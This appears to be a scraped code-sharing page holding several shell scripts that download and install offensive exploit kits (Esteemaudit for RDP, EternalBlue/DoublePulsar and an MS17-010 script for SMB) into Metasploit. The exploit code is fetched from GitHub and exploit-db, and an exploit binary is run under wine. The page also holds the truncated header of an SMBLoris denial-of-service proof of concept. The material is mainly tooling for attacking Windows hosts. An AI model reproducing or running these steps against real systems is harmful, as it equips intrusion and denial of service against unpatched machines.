View esteemaudit-install.sh
dpkg --add-architecture i386 | |
apt-get update && apt-get install wine32 git | |
git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit | |
mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp/ | |
cp Esteemaudit-Metasploit/esteemaudit.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/ | |
mkdir /usr/share/esteemaudit/ | |
cp Esteemaudit-Metasploit/files/* /usr/share/esteemaudit/ | |
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe 2>0 | |
rm -rf Esteemaudit-Metasploit |
View eternal-2016-install.sh
wget https://www.exploit-db.com/download/42315 -O eternal2016.py | |
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py | |
touch __INIT__.py |
View eternalblue-x86-install.sh
apt-get update -y | |
apt-get upgrade -y | |
apt-get install wine -y | |
apt-get install winetricks -y | |
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 -y | |
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit | |
cd Eternalblue-Doublepulsar-Metasploit/ | |
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb | |
mkdir -p /root/.wine/drive_c/ |
View smbloris.c
/* SMBLoris attack proof-of-concept | |
* | |
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st> | |
* | |
* Licensed under the terms of the 2-clause BSD license. | |
* | |
* This is a proof of concept of a publicly disclosed vulnerability. | |
* Please do not go around randomly DoSing people with it. | |
* | |
* Tips: do not use your local IP as source, or if you do, use iptables to block |